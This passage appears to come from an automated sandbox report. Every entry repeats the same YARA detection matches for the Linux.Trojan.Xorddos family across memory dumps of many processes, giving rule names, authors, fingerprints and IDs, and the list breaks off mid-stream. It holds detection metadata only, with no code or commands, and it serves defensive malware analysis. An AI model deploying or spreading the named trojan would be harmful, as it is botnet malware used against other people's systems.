            Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10269.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10258.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9816.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10324.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9563.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9926.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9871.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10247.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10115.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10214.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10192.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9794.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9695.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10390.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9706.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10137.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9640.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10379.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9915.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9728.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
